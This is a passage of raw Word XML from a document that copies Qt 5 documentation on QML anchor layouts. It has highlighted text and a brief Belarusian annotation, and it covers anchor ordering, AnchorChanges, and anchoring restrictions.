              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> reanchorToRight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left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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>undefined</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right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parent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right</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49">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rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6406"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251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49">
            <w:pPr>
              <w:pStyle w:val="centeralign"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/anchor_ordering.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A2BD2">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A2BD2">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png"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"http://doc.qt.io/qt-5/images/anchor_ordering.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00490E7E">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002230B8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:pict>
                <v:shape id="_x0000_i1067" type="#_x0000_t75" alt="" style="width:4in;height:179.7pt">
                  <v:imagedata r:id="rId2336" r:href="rId2337"/>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251D49">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00123BBC" w:rsidRPr="00123BBC" w:rsidRDefault="00D1065E" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Тут вельмі важны парадак //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Because the evaluation order of bindings is not defined</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00123EA8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it is not recommended to change anchors via conditional bindings</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, as this can lead to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00123EA8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ordering issue</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> described above. In the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00123EA8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Rectangle will eventually grow to the full width of its parent, because both left and right anchors will be simultaneously set during binding update.</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//bad code</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width</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50</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height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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50</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state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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"right"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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>undefined</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parent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left</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anchors</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right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state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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"right"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parent</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right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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>undefined</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00D1065E" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This should be rewritten to use</w:t>
      </w:r>
      <w:r w:rsidR="00123EA8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2338" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnchorChanges</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00123EA8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instead, as</w:t>
      </w:r>
      <w:r w:rsidR="00123EA8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2339" w:history="1">
        <w:r w:rsidRPr="00123EA8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnchorChanges</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00123EA8" w:rsidRPr="00123EA8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00123EA8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will automatically</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> handle ordering issues internally.</w:t>
      </w:r>
      <w:r w:rsidR="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1065E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//  //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00D1065E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1976" w:name="restrictions"/>
      <w:bookmarkStart w:id="1977" w:name="_Toc483000958"/>
      <w:bookmarkStart w:id="1978" w:name="_Toc483003949"/>
      <w:bookmarkStart w:id="1979" w:name="_Toc483604301"/>
      <w:bookmarkStart w:id="1980" w:name="_Toc483605521"/>
      <w:bookmarkEnd w:id="1976"/>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Restrictions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1977"/>
      <w:bookmarkEnd w:id="1978"/>
      <w:bookmarkEnd w:id="1979"/>
      <w:bookmarkEnd w:id="1980"/>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>performance reasons</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, you </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only anchor an item to its siblings and direct parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example, the following anchor is invalid and would produce a warning:</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//bad code</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Item</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id</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group1</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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id</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rect1</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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51D49">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    id</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> group2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="008D4C56" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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Rectangle</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id</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rect2</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anchors</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left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rect1</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right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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// invalid anchor!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Also, </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchor-based layouts cannot be mixed with absolute positioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If an item specifies its</w:t>
      </w:r>
      <w:r w:rsidR="00D1065E" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2340" w:anchor="x-prop" w:history="1">
        <w:r w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>x</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D1065E" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>position and also sets</w:t>
      </w:r>
      <w:r w:rsidR="00D1065E" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2341" w:anchor="anchors.left-prop" w:history="1">
        <w:r w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>anchors.left</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, or anchors its left and right edges but additionally sets a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2342" w:anchor="width-prop" w:history="1">
        <w:r w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>width</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the result is undefined</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, as it would not be clear whether the item should use anchoring or absolute positioning. The </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>same</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be said for setting an item's</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2343" w:anchor="y-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>y</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
